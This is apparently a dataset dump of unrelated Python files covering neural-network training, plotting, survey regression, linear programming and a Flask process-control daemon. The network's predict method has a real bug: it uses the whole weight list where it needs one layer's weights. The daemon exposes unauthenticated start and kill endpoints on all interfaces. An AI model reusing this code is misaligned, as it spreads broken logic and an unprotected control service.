bias\n w = np.random.randn(layers[i] + 1, layers[i + 1] + 1)\n self.W.append(w / np.sqrt(layers[i]))\n w = np.random.randn(layers[-2] + 1, layers[-1])\n self.W.append(w / np.sqrt(layers[-2]))\n\n def sigmoid_deriv(self, x):\n\n # compute the derivative of the sigmoid function ASSUMING\n # that ‘x‘ has already been passed through the ‘sigmoid‘\n # function\n return x * (1 - x)\n\n def sigmoid(self, x):\n\n # compute and return the sigmoid activation value for a\n # given input value\n return 1.0 / (1 + np.exp(-x))\n\n def __repr__(self):\n\n # construct and return a string that represents the network\n # architecture\n return \"NeuralNetwork: {}\".format(\n \"-\".join(str(l) for l in self.layers))\n\n def fit_partial(self, x, y):\n\n # construct our list of output activations for each layer\n # as our data point flows through the network; the first\n # activation is a special case -- it’s just the input\n # feature vector itself\n A = [np.atleast_2d(x)]\n for layer in np.arange(0, len(self.W)):\n net = A[layer].dot(self.W[layer])\n out = self.sigmoid(net)\n A.append(out)\n error = A[-1] - y\n D = [error * self.sigmoid_deriv(A[-1])]\n for layer in np.arange(len(A) - 2, 0, -1):\n # the delta for the current layer is equal to the delta\n # of the *previous layer* dotted with the weight matrix\n # of the current layer, followed by multiplying the delta\n # by the derivative of the nonlinear activation function\n # for the activations of the current layer\n delta = D[-1].dot(self.W[layer].T)\n delta = delta * self.sigmoid_deriv(A[layer])\n D.append(delta)\n D = D[::-1]\n for layer in np.arange(0, len(self.W)):\n self.W[layer] += -self.alpha * A[layer].T.dot(D[layer])\n\n def predict(self, X, addBias=True):\n p = np.atleast_2d(X)\n if addBias:\n p = np.c_[p, np.ones((p.shape[0]))]\n\n for layer in np.arange(0, len(self.W)):\n p = self.sigmoid(np.dot(p, self.W))\n return p\n\n def calculate_loss(self, X, targets):\n\n targets = np.atleast_2d(targets)\n predictions = self.predict(X, addBias=False)\n loss = 0.5 * np.sum((predictions - targets) ** 2)\n\n return loss\n\n def fit(self, X, y, epochs=1000, displayUpdate=100):\n\n # insert a column of 1’s as the last entry in the feature\n # matrix -- this little trick allows us to treat the bias\n # as a trainable parameter within the weight matrix\n X = np.c_[X, np.ones((X.shape[0]))]\n # loop over the desired number of epochs\n for epoch in np.arange(0, epochs):\n # loop over each individual data point and train\n # our network on it\n for (x, target) in zip(X, y):\n self.fit_partial(x, target)\n\n if epoch == 0 or (epoch + 1) % displayUpdate == 0:\n loss = self.calculate_loss(X, y)\n print(\"[INFO] epoch={}, loss={:.7f}\".format(\n epoch + 1, loss))\n","sub_path":"pyimagesearch/nn/NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"80607166","text":"#create function/ define func\n# i, j are varables/ parameters\n\ndef iiec(*i):\n\tm = 0\n\tfor j in i:\n\t\tm = j + m\n\treturn m\t\n\n\n# to run / calling a func\n\nu = iiec(2,5,8,4,1)\nprint(u)\n\nd = iiec(3,2)\nprint(d)","sub_path":"f.py","file_name":"f.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"495882574","text":"from argparse import Namespace, ArgumentParser\nfrom typing import Dict, List\nfrom pathlib import Path\nfrom itertools import chain\n\nimport torch\nfrom torch import nn\nfrom torch.optim import Adam\nfrom torch.utils.data import DataLoader\nfrom pytorch_lightning import LightningModule\nfrom ipdb import set_trace\n\nfrom src.preprocess import preprocess\nfrom src.tokenizer import get_tokenizer, WordLevelTokenizer\nfrom src.dataset import MultiWozDSTDataset\nfrom src.positional_embedding import PositionalEncoding\n\n\ndef ctc_collapse(seq: List, padding) -> List:\n collapse = []\n prev = None\n for x in seq:\n if x == prev or x == padding:\n pass\n else:\n collapse.append(x)\n prev = x\n return collapse\n\n\nclass NATODS(LightningModule):\n @staticmethod\n def add_model_specific_args(parent_parser):\n parser = ArgumentParser(parents=[parent_parser])\n\n # Embedding / Vocab\n parser.add_argument('--embedding_dim', default=256)\n\n parser.add_argument('--dropout', default=0.1)\n\n # Transformer Encoder\n parser.add_argument('--hidden_dim', default=256)\n parser.add_argument('--num_heads', default=4)\n parser.add_argument('--num_passes', default=2)\n\n # optimizer\n parser.add_argument('--lr', default=3e-4, type=float)\n parser.add_argument('--weight_decay', default=0, type=float)\n\n # data\n parser.add_argument('--input_multiplier', default=4, type=int,\n help='# times to repeat input in order to make input longer than output')\n\n # dataset\n parser.add_argument('--train_path',\n default='./.data/MultiWoz_2.1_NADST_Version/data2.1/nadst_train_dials.json')\n parser.add_argument('--val_path',\n default='./.data/MultiWoz_2.1_NADST_Version/data2.1/nadst_dev_dials.json')\n parser.add_argument('--test_path',\n default='./.data/MultiWoz_2.1_NADST_Version/data2.1/nadst_test_dials.json')\n parser.add_argument('--ontology_path',\n default='./.data/MultiWoz_2.1_NADST_Version/data2.1/multi-woz/MULTIWOZ2.1/ontology.json')\n\n # tokenizer\n parser.add_argument('--tokenizer_path',\n default='./tokenizer/multiwoz2.1-vocab.json')\n\n # dataloader\n parser.add_argument('--batch_size', default=128, type=int)\n\n return parser\n\n def __init__(self, hparams: Namespace):\n super().__init__()\n self.hparams = hparams\n\n self.criterion = nn.CTCLoss()\n\n if Path(self.hparams.tokenizer_path).exists():\n self.tokenizer = WordLevelTokenizer(self.hparams.tokenizer_path)\n else:\n train_turns = preprocess(self.hparams.train_path,\n self.hparams.ontology_path)\n self.tokenizer = get_tokenizer(train_turns,\n self.hparams.tokenizer_path)\n\n # embedding\n self.embedding = nn.Embedding(self.tokenizer.get_vocab_size(),\n self.hparams.embedding_dim)\n self.pos_embedding = PositionalEncoding(\n d_model=self.hparams.embedding_dim,\n dropout=self.hparams.dropout)\n\n # value decoder\n self.value_decoder = nn.ModuleList([\n nn.MultiheadAttention(\n embed_dim=self.hparams.hidden_dim,\n num_heads=self.hparams.num_heads,\n dropout=self.hparams.dropout)\n for _ in range(3)])\n self.vocab_proj = nn.Linear(self.hparams.hidden_dim,\n self.tokenizer.get_vocab_size())\n\n def forward(self,\n batch: Dict[str, torch.Tensor]\n ) -> torch.Tensor:\n # history\n delex_history_embed = self.pos_embedding(\n self.embedding(batch['ids_delex_history']))\n history_embed = self.pos_embedding(\n self.embedding(batch['ids_history']))\n\n # value decoder's input\n fert_domain_embed = self.embedding(batch['ids_input_domain'])\n fert_slot_embed = self.embedding(batch['ids_input_slot'])\n fert_token_embed = self.pos_embedding(\n fert_domain_embed + fert_slot_embed)\n\n # value decooding\n z_fert_ds = self.forward_attentions(self.value_decoder,\n fert_token_embed,\n delex_history_embed,\n history_embed)\n value_logit = self.vocab_proj(z_fert_ds)\n return value_logit\n\n def forward_attentions(self, decoders, token_embed,\n delex_history_embed, history_embed\n ) -> torch.Tensor:\n assert len(decoders) == 3\n assert self.hparams.num_passes > 0\n z_ds_0 = token_embed\n for _ in range(self.hparams.num_passes):\n z_ds_1, _ = decoders[0].forward(\n query=z_ds_0, key=z_ds_0, value=z_ds_0,\n )\n z_ds_2, _ = decoders[1].forward(\n query=z_ds_1, key=delex_history_embed, value=delex_history_embed,\n )\n z_ds_3, _ = decoders[2].forward(\n query=z_ds_2, key=history_embed, value=history_embed,\n )\n z_ds_0 = z_ds_3 + z_ds_0\n return z_ds_0\n\n def calculate_loss(self,\n logits: torch.Tensor,\n batch: Dict\n ) -> torch.Tensor:\n log_probs = logits.log_softmax(-1)\n intput_lengths = torch.LongTensor(\n [log_probs.size(0)] * log_probs.size(1))\n targets = batch['value'].T\n target_lengths = torch.sum(targets != self.train_dataset.ignore_idx, 1)\n assert all(intput_lengths[0] >= l for l in target_lengths), target_lengths\n loss = self.criterion(log_probs, targets,\n intput_lengths, target_lengths)\n return loss\n\n def calculate_metrics(self,\n outputs: List[Dict[ str, torch.Tensor]],\n ) -> Dict[str, float]:\n metrics = {}\n pred_idxs = torch.cat([x['preds'] for x in outputs], 1).T\n preds_str = self.tokenizer.decode_batch(\n [ctc_collapse(seq, 0) for seq in pred_idxs.tolist()])\n value_str = list(chain.from_iterable([x['value_str'] for x in outputs]))\n assert len(value_str) == len(preds_str)\n metrics['accuracy/joint'] = \\\n sum(1 if gt == pred else 0\n for gt, pred in zip(value_str, preds_str)) / len(value_str)\n return metrics\n\n def training_step(self, batch, batch_idx):\n logits = self.forward(batch)\n loss = self.calculate_loss(logits, batch)\n return {'loss': loss, 'log': {'loss/train': loss}}\n\n def validation_step(self, batch, batch_idx):\n logits = self.forward(batch)\n loss = self.calculate_loss(logits, batch)\n return {'loss': loss.cpu(),\n 'preds': logits.cpu().argmax(-1),\n 'value_str': batch['value_str'],\n }\n\n def validation_epoch_end(self, outputs, mode='val'):\n loss = torch.stack([x['loss'] for x in outputs]).mean()\n metrics = self.calculate_metrics(outputs)\n log = {\n **{f\"loss/{mode}\": loss},\n **{f'metrics/{mode}/{k}': v for k, v in metrics.items()}\n }\n return {f'{mode}_loss': loss, 'log': log}\n\n def test_step(self, *args, **kwargs):\n return self.validation_step(*args, **kwargs)\n\n def test_epoch_end(self, *args, **kwargs):\n return self.validation_epoch_end(*args, **kwargs, mode='test')\n\n def configure_optimizers(self):\n optimizer = Adam(\n self.parameters(),\n lr=self.hparams.lr,\n weight_decay=self.hparams.weight_decay,\n )\n return optimizer\n\n def prepare_data(self) -> None:\n train_turns = preprocess(self.hparams.train_path,\n self.hparams.ontology_path)\n val_turns = preprocess(self.hparams.val_path,\n self.hparams.ontology_path)\n test_turns = preprocess(self.hparams.test_path,\n self.hparams.ontology_path)\n self.train_dataset = MultiWozDSTDataset(train_turns,\n self.tokenizer,\n self.hparams.input_multiplier)\n self.val_dataset = MultiWozDSTDataset(val_turns,\n self.tokenizer,\n self.hparams.input_multiplier)\n self.test_dataset = MultiWozDSTDataset(test_turns,\n self.tokenizer,\n self.hparams.input_multiplier)\n\n def train_dataloader(self) -> DataLoader:\n return DataLoader(\n self.train_dataset,\n batch_size=self.hparams.batch_size,\n shuffle=True,\n collate_fn=self.train_dataset.collate_fn,\n )\n\n def val_dataloader(self) -> DataLoader:\n return DataLoader(\n self.val_dataset,\n batch_size=self.hparams.batch_size,\n collate_fn=self.val_dataset.collate_fn,\n )\n\n def test_dataloader(self) -> DataLoader:\n return DataLoader(\n self.test_dataset,\n batch_size=self.hparams.batch_size,\n collate_fn=self.test_dataset.collate_fn,\n )\n","sub_path":"src/ctcdst/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":9620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"554088405","text":"\n# def longest_word():\n \n\n# longest_word()\n\nprint('Lets see which word is the longest')\nprint('Heres the list')\nwords = [\n 'mystery',\n 'brother',\n 'aviator',\n 'crocodile',\n 'pearl',\n 'orchard',\n 'crackpot'\n]\nprint(words)\nlongest = max(words, key=len)\nprint('The longest word is:', longest)","sub_path":"exercises/longest_word.py","file_name":"longest_word.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"304979172","text":"import re\nimport os\nimport argparse\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom mu2e import mu2e_ext_path\nfrom emtracks.plotting import config_plots\n\nconfig_plots()\n\ndef check_dir(dirname):\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n\n# a few functions to keep code DRY\ndef get_data(df, var, query=None):\n if query is None:\n df_ = df\n else:\n df_ = df.query(query)\n data = df_[var].values\n return data\n\n# reference label\n# label_temp = '{0}\\n' + r'$\\mu = {1:.3E}$'+ '\\n' + 'std' + r'$= {2:.3E}$' + '\\n' + 'Integral: {3}\\n' + 'Underflow: {4}\\nOverflow: {5}'\n\ndef get_label(name, data, bins):\n if type(bins) == int:\n over=0\n under=0\n # sci\n # mean = f'{np.mean(data):.3E}'\n # std = f'{np.std(data, ddof=1):.3E}'\n # label = f'mean: {mean:>15}' + '\\n' + f'stddev: {std:>15}' + '\\n' + f'Integral: {len(data):>17}\\nUnderflow: {under:>16}\\nOverflow: {over:>16}'\n # float\n # mean = f'{np.mean(data):.1f}'\n # std = f'{np.std(data, ddof=1):.1f}'\n mean = f'{np.mean(data):.2f}'\n std = f'{np.std(data, ddof=1):.2f}'\n label = f'mean: {mean:>9}' + '\\n' + f'stddev: {std:>8}' + '\\n' + f'Integral: {len(data):>5}\\nUnder: {under:>11}\\nOver: {over:>13}'\n else:\n over = (data > np.max(bins)).sum()\n under = (data < np.min(bins)).sum()\n data = data[(data <= np.max(bins)) & (data >= np.min(bins))]\n # sci\n # mean = f'{np.mean(data):.3E}'\n # std = f'{np.std(data, ddof=1):.3E}'\n # label = f'mean: {mean:>15}' + '\\n' + f'stddev: {std:>15}' + '\\n' + f'Integral: {len(data)-over-under:>17}\\nUnderflow: {under:>16}\\nOverflow: {over:>16}'\n # float\n # mean = f'{np.mean(data):.1f}'\n # std = f'{np.std(data, ddof=1):.1f}'\n mean = f'{np.mean(data):.2f}'\n std = f'{np.std(data, ddof=1):.2f}'\n label = f'mean: {mean:>9}' + '\\n' + f'stddev: {std:>8}' + '\\n' + f'Integral: {len(data)-over-under:>5}\\nUnder: {under:>11}\\nOver: {over:>13}'\n # label = f'{name}\\n' + rf'$\\mu: {np.mean(tand):.3E}$' + '\\n' + rf'$\\sigma: {np.std(tand):.3E}$' + '\\n' + f'Integral: {len(tand)}\\nUnderflow: {under}\\nOverflow: {over}'\n # std = f'{np.std(data):.3E}'\n # n = 15\n return label\n\ndef make_plot_hist(df, name='Mau9 70%', var='tand_Mau9_70', xl=r'$\\tan(\\mathrm{dip})$', query=None, queryn='full', bins=20, legendloc='upper right', plotdir=None, Bname=\"\", fig=None, ax=None, save=True):\n data = get_data(df, var, query)\n if ax is None:\n fig, ax = plt.subplots()\n sname = re.search('_(.*)_', Bname).group(1).replace('_','\\ ')\n # sname = Bname[:-9] # re.search('_(.*)_', Bname).group(1)\n # sname = \"\"# Bname[:-9] # re.search('_(.*)_', Bname).group(1)\n ax.hist(data, bins=bins, histtype='step', linewidth=1.5, label=rf'$\\bf{{{sname}}}$'+'\\n'+get_label(None, data, bins))\n # ax.hist(data, bins=bins, histtype='step', linewidth=1.5, label=get_label(None, data, bins))\n ax.set_ylabel('Events')\n ax.set_xlabel(xl)\n if query is None:\n plt.title(Bname)\n else:\n plt.title(Bname+'\\n'+queryn)\n plt.legend(loc=legendloc, fontsize=14)\n # plt.xlim([-1.,1.]) # MeV\n # plt.xlim([-1000.,1000.]) # keV\n if save:\n h = ''\n # h = '_huber'\n fig.savefig(plotdir+Bname+h+'.pdf')\n fig.savefig(plotdir+Bname+h+'.png')\n return fig, ax\n\nif __name__=='__main__':\n # check plot output directory and create if doesn't exist\n #######\n #B_dir = 'cartesian_test' # done\n # B_dir = 'default' # done\n B_dir = 'k2_test' # done\n # B_dir = 'delta_Z_tests' # done\n # B_dir = 'hp_bias' # done\n # B_dir = 'ensemble_random_scale_factor' # done\n #######\n pdir = mu2e_ext_path + 'pickles/Bfit_CE_reco/' + B_dir + '/'\n # plotdir = mu2e_ext_path + 'plots/html/deltaP/' + B_dir + '/'\n plotdir = mu2e_ext_path + 'plots/html/deltaP/' + B_dir + '/single/'\n check_dir(plotdir)\n\n # get files in pickle directory\n files = sorted(os.listdir(pdir))\n # files_run = [i for i in files if i != \"Mau13_sparserz_huber_deltaP.p\"]\n # files_run = [i for i in files if i != \"Mau13_sparserz_deltaP.p\"]\n files_run = files\n # print(files_run)\n\n # xl = r'$p_{\\mathrm{MC}} -p_{\\mathrm{fit}}$ [keV]'\n xl = 'Momentum Shift [keV]'\n\n fig = None; ax = None\n for f in files_run:\n fig = None; ax = None\n df = pd.read_pickle(pdir+f)\n # make_plot_hist(df, var='deltaP', xl=xl, query=None, queryn='', bins=20, legendloc='best', plotdir=plotdir, Bname=f[:-2])\n # UNITS keV\n df.eval('deltaP = deltaP * 1000', inplace=True)\n # fig, ax = make_plot_hist(df, var='deltaP', xl=xl, query=None, queryn='', bins=np.linspace(-1000,1000,201), legendloc='upper left', plotdir=plotdir, Bname=f[:-2], fig=fig, ax=ax)\n # fig, ax = make_plot_hist(df, var='deltaP', xl=xl, query=None, queryn='', bins=np.linspace(-50,50,51), legendloc='upper left', plotdir=plotdir, Bname=f[:-2], fig=fig, ax=ax)\n fig, ax = make_plot_hist(df, var='deltaP', xl=xl, query=None, queryn='', bins=20, legendloc='upper left', plotdir=plotdir, Bname=f[:-2], fig=fig, ax=ax, save=True)\n # ALTERATION FOR MSC SEMINAR\n ax.plot([0., 0.], [0., 150.], 'r--')\n ax.set_xlim([-100, 100])\n ax.set_ylim([0, 145])\n fig.savefig(f'/home/ckampa/data/plots/html/deltaP/MSC_June2023/{B_dir}_{f}_wide.pdf')\n fig.savefig(f'/home/ckampa/data/plots/html/deltaP/MSC_June2023/{B_dir}_{f}_wide.png')\n # plt.show()\n","sub_path":"scripts/FieldFitting/deltaP_Bfit_plots.py","file_name":"deltaP_Bfit_plots.py","file_ext":"py","file_size_in_byte":5558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"11414853","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn import linear_model\nimport math\nfrom sklearn.preprocessing import OneHotEncoder\ndf_schema = pd.read_csv('survey_results_schema.csv')\ndf_survey = pd.read_csv('survey_results_public.csv',\n usecols=['Respondent','YearsCode','Age1stCode','WorkWeekHrs','CodeRevHrs','Age'],\n index_col='Respondent')\ndf_survey.head(20)\ndf_survey.shape\ndf_survey.dropna(inplace=True)\ndf_survey.shape\ndf_survey['CodeRevHrs'] = df_survey['CodeRevHrs'].astype('int64')\ndf_survey.replace(to_replace='Younger than 5 years', value='4', inplace=True)\ndf_survey.replace(to_replace='Older than 85', value='86', inplace=True)\ndf_survey.replace(to_replace={'Less than 1 year': '0',\n 'More than 50 years': '51'},\n inplace=True)\ndf_survey = df_survey.astype('int64', copy=False)\nplt.plot(df_survey['Age'], df_survey['YearsCode'], 'ro', markersize=0.3)\nplt.xlabel('Age')\nplt.ylabel('YearsCode')\nplt.show()\nplt.plot(df_survey['Age'], df_survey['Age1stCode'], 'ro', markersize=0.3)\nplt.xlabel('Age')\nplt.ylabel('Age1stCode')\nplt.show()\nplt.plot(df_survey['Age1stCode'], df_survey['YearsCode'], 'ro', markersize=0.3)\nplt.xlabel('Age1stCode')\nplt.ylabel('YearsCode')\nplt.show()\n#x1 = Age\n#x2 = Age1stCode\n#y = YearsCode\ndf_survey ['CodeRev'] = pd.read_csv('survey_results_public.csv',\n usecols=['CodeRev'])\ndf_survey.replace(to_replace='Yes, because I see value in code review', value='Yes', inplace=True)\ndf_survey.replace(to_replace='Yes, because I was told to do so', value='Yes', inplace=True)\nCodeRev = df_survey['CodeRev']\nfor index, category in CodeRev.items():\n if (not isinstance(category, str) and math.isnan(category)):\n CodeRev[index] = 0\ndf_survey['CodeRev'] = CodeRev\ndf_survey.replace(to_replace='Yes', value='1', inplace=True)\ndf_survey.replace(to_replace='No', value='0', inplace=True)\ndf_survey ['Student'] = pd.read_csv('survey_results_public.csv',\n usecols=['Student'])\nX = df_survey['Student']\nX_new = []\nunique_categories = {}\ncurrent_index = 0\nfor index, value in X.items():\n category = value\n if (not isinstance(category, str) and math.isnan(category)):\n category = 'No answer'\n\n if (category not in unique_categories):\n current_index += 1\n unique_categories[category] = current_index\n X_new.append([current_index, category])\n X[index] = unique_categories[category]\n\nohe = OneHotEncoder(categories='auto')\nstudents_categories = ohe.fit_transform(X_new).toarray()\ndf_survey['CodeRev'] = df_survey['CodeRev'].astype('int64')\ndf_survey['Student'] = X.astype('int64')\ndf_survey_clr = df_survey[['YearsCode','Age1stCode','Age','CodeRev','Student']]\nQ1 = df_survey_clr.quantile(0.25)\nQ3 = df_survey_clr.quantile(0.75)\nIQR = Q3 - Q1\ndf_survey_clr_q = df_survey_clr[~((df_survey_clr < (Q1 - 1.5 * IQR)) | (df_survey_clr > (Q3 + 1.5 * IQR))).any(axis=1)]\ndf_survey_clr_sd = df_survey_clr[np.abs(df_survey_clr - df_survey_clr.mean()) <= 3*df_survey_clr.std()]\ndf_survey_clr_sd.isna().sum()\ndf_survey_clr_sd = df_survey_clr_sd.dropna()\ndf_survey_clr_m = df_survey_clr[df_survey_clr.YearsCode < 40]\nx = df_survey_clr['YearsCode']\nplt.hist(x, bins=100)\nplt.show();\ndf_survey_clr_row = df_survey_clr[df_survey_clr.YearsCode > 40].index\ndf_survey_clr_fin = df_survey_clr.drop(df_survey_clr_row, axis=0)\nprint(df_survey_clr.corr())\nprint(df_survey_clr_fin.corr())\nsns.boxplot(y='YearsCode', data=df_survey_clr_fin)\nplt.show();\nreg4_1 = linear_model.LinearRegression()\nreg4_1_r = reg4_1.fit(df_survey_clr_fin[['Age']], df_survey_clr_fin['YearsCode'])\nreg4_1_y_p = reg4_1.predict([[60]])\nreg4_2 = linear_model.LinearRegression()\nreg4_2_r = reg4_2.fit(df_survey_clr_fin[['Age','Age1stCode']], df_survey_clr_fin['YearsCode'])\nreg4_2_y_p = reg4_2.predict(df_survey_clr_fin[['Age','Age1stCode']])\nreg4_3 = linear_model.LinearRegression()\nreg4_3_y = reg4_3.fit(df_survey_clr_fin[['Age','Age1stCode','CodeRev','Student']],df_survey_clr_fin['YearsCode'])\nreg4_3_y_p = reg4_3.predict(df_survey_clr_fin[['Age','Age1stCode','CodeRev','Student']])\n\n","sub_path":"Zestaw_zadan2.py","file_name":"Zestaw_zadan2.py","file_ext":"py","file_size_in_byte":4196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"192835652","text":"import pulp\nfrom pulp import * \n\n# declare your variables\nx1 = LpVariable(\"x1\",lowBound=0,cat='Integer') \nx2 = LpVariable(\"x2\",lowBound=0,cat='Integer') \nx3 = LpVariable(\"x3\",lowBound=0,cat='Integer') \n\n# defines the problem\nprob = LpProblem(\"problem\", LpMaximize)\n\n# defines the constraints\nprob += x1 + x2 + x3 <= 99 #less than 100 pages\nprob += x3 - x2 >= 5 #environ. at least 5 more than military\nprob += x1 - x2 >= 5 #economy at least 5 more than military\n#prob += x2 >= 3\n\n# defines the objective function to maximize\n# impact function\nprob += 5*x1\nprob += 2*x2\nprob += 4*x3\n\n# solve the problem\nstatus = prob.solve(GLPK(msg=0))\nLpStatus[status]\n\nvalue(x1)\nvalue(x2)\nvalue(x3)\n\nprint(prob)\nprint(x1.varValue)\nprint(x2.varValue)\nprint(x3.varValue)\n\n","sub_path":"400 - MathModellers/week 5/midterms/q6v2.py","file_name":"q6v2.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"282154236","text":"import Image, ImageFont, ImageDraw\nimport numpy as np\nimport os\n\ndef getText(input, size):\n\tresult = \"\"\n\tfont = ImageFont.truetype('arialbd.ttf', size) #load the font\n\tsize = font.getsize(input) #calc the size of text in pixels\n\timage = Image.new('1', size, 1) #create a b/w image\n\tdraw = ImageDraw.Draw(image)\n\tdraw.text((0, 0), input, font=font) #render the text to the bitmap\n\tfor rownum in range(size[1]):\n\t\t# scan the bitmap: print ' ' for black pixel and print '#' for white one\n\t\tline = []\n\t\tfor colnum in range(size[0]-1):\n\t\t\tif image.getpixel((colnum, rownum)):\n\t\t\t\tline.append(' '),\n\t\t\telse:\n\t\t\t\tline.append('#'),\n\t\tcurrentLine = ''.join(line)\n\t\tfor ele in currentLine:\n\t\t\tif ele == \"#\":\n\t\t\t\tif rownum != size[1] - 1:\n\t\t\t\t\tresult += currentLine + \"\\n\"\n\t\t\t\telse:\n\t\t\t\t\tresult += currentLine\n\t\t\t\tbreak\n\treturn result\n\nnewX = []\nnewY = []\ntext = getText(\"Hello World!\",80)\nlineCounter = len(text.split('\\n'))\nfor line in text.split('\\n'):\n\teleCounter = 0\n\tfor ele in line:\n\t\tif ele == \"#\":\n\t\t\tnewX.append(eleCounter)\n\t\t\tnewY.append(lineCounter)\n\t\teleCounter += 1\n\tlineCounter -= 1\ndata = np.append(np.array(newX), np.array(newY)).reshape(2,len(newX)).transpose()\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\ndataAsText = \"\"\nfor line in data:\n\tdataAsText += str(line[0]) + \",\" + str(line[1]) + \",0\\n\"\nwith open(os.path.join(dir_path, \"..\",\"..\", \"data\", \"testData.txt\"),'w') as file:\n\tfile.write(dataAsText)","sub_path":"mllib/basics/helloWorldGenerator.py","file_name":"helloWorldGenerator.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"113704568","text":"from flask import Flask, escape, request, url_for, send_file\nimport logging\nimport subprocess\nimport os\nimport signal\n\napp = Flask(__name__)\n\nshell_cmd = 'python3 main.py'\np = subprocess.Popen(shell_cmd, shell=True)\n\n\"\"\"\nstatus() return code:\n0 - running\n1 - normal exit\n2 - exit on error\n3 - killed by signal\n\"\"\"\n\n\n@app.route('/status')\ndef status():\n if p.poll() is None:\n return '0'\n elif p.poll() == 0:\n return '1'\n elif p.poll() > 0:\n return '2'\n return '3'\n\n\n\"\"\"\npid() returns subprocess (repo)'s process id\n\"\"\"\n\n\n@app.route('/pid')\ndef pid():\n return str(p.pid)\n\n\n\"\"\"\nstop() returns 0, a confirmation.\n\"\"\"\n\n\n@app.route('/stop')\ndef stop():\n if p.poll() is None:\n os.kill(p.pid, signal.SIGTERM)\n return '0'\n\n\n\"\"\"\nrestart() returns 0, a confirmation.\n\"\"\"\n\n\n@app.route('/restart')\ndef restart():\n global p\n if p.poll() is None:\n os.kill(p.pid, signal.SIGTERM)\n p = subprocess.Popen(shell_cmd, shell=True)\n return '0'\n\n\n@app.route('/start')\ndef start():\n global p\n if p.poll() is None:\n return '0' #'already running' user doesn't need to know this detail\n p = subprocess.Popen(shell_cmd, shell=True)\n return '0'\n\n\n@app.route('/perform_test')\ndef perform_test():\n return 'not yet implemented'\n\n\ndef main():\n logging.info('repo daemon has been started')\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(format='[%(asctime)s]%(levelname)s:%(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n level=logging.INFO)\n app.run(host='0.0.0.0', port=9876)\n try:\n main()\n except KeyboardInterrupt:\n pass\n","sub_path":"obsolete/control_center/repo_daemon.py","file_name":"repo_daemon.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"68235014","text":"#!/bin/python\n#from hyaline_state import *\nimport threading\n# from twitter.common import log\nfrom hyaline.scheduler.hyaline_scheduler import log\nimport time\nclass Enum(set):\n def __getattr__(self, name):\n if name in self:\n return name\n raise AttributeError\n\nNodestate = Enum([\"STAGING\",\"STAGING_FAILED\", \"STARTING\", \"STARTING_FAILED\", \"RUNNING\", \"STOPPING\", \"STOPPING_FAILED\", \"STOPPED\",\n \"PHYSICS_RESTORING\", \"PHYSICS_RESTORING_FAILED\", \"SERVICE_RESTORING\", \"SERVICE_RESTORING_FAILED\",\n \"DATA_RESTORING\", \"CHANGE_HOST_RESTORING\", \"CHANGE_HOST_RESTORING_FAILED\",\n \"DELETING\", \"DELETING_FAILED\", \"DELETED\", \"SHIFTDELETING\", \"SHIFTDELETED\",\n \"SERVICE_RESTORE_START\",\"CHANGE_HOST_RESTORE_START\",\"PHYSICS_RESTORE_START\",\n \"EXPANDING\",\"EXPANDING_FAILED\",\"CONTRACTING\",\"CONTRACTING_FAILED\"])\n#STARTING: node is starting,\n#RUNNING: node is good running\n#STOPING: node is stopping, when it done, nodestate will be STOPPED\n#STOPPED: node is already stopped, it can be started again.\n#SERVICE_RESTORING: node is restoring mysql service in original engine,if this operation succeed,state will be DATA_RESTORING,\n# otherwise state will be WAITING_SERVICE_RESTORE or RESTORE_FAILED\n#DATA_RESTORING: node is restoring mysql data , if this operation succeed,state will be RUNNING,\n# otherwise state will be WAITING_SERVICE_RESTORE or RESTORE_FAILED\n#CHANGE_HOST_RESTORING:\n#RESTORE_FAILED: can not restore node\n#DELETED: node is deleted and can not be started again.\nClusterstate=Enum([\"INITIALIZING\", \"LAUNCHING\", \"INITIALIZING_FAILED\", \"STARTING\", \"STARTING_FAILED\", \"DELETING\",\n 'DELETED', \"DELETING_FAILED\", \"RUNNING\", \"RESTORE\", \"ADDINGNODE\", \"ADDINGNODE_FAILED\",\n \"STARTINGNODE\", \"STARTINGNODE_FAILED\", \"STOPPINGNODE\", \"STOPPINGNODE_FAILED\", \"DELETINGNODE\",\n \"DELETINGNODE_FAILED\", \"STOPPING\", \"STOPPING_FAILED\", \"STOPPED\", \"STOPNODE\",\"SHIFTDELETE\"])\n\n#INITIALIZING: cluster is starting, when cluster is created ,this will be set\n#ADD : cluster is adding a node ,the cluster can not be operated by others in this state.\n#DELETE: cluster is already deleted.\n#RUNNING : all node of this cluster is good running, when you want to operate cluster, this state should be changed.\n#RESTORE : some node of this cluster is not in the state of RUNNING\n\nclass Stateupdate(object):\n def __init__(self, mysqlcluster):\n self._cluster = mysqlcluster\n self._lock = threading.Lock()\n\n def nodestate_update(self, task_id, nodestate):\n with self._lock:\n cluster_name = self._cluster.name\n try:\n task = self._cluster.tasks[task_id]\n except KeyError:\n log.error(\"Task %s not in cluster %s\" % (task_id, self._cluster.name))\n return False\n task.count = 0\n previous_state = task.nodestate\n previous_clusterstate = self._cluster.clusterstate\n if previous_state == nodestate:\n return False\n task.nodestate = nodestate\n log.info(\"Update %s's nodestate from %s to %s. \" % (task_id, 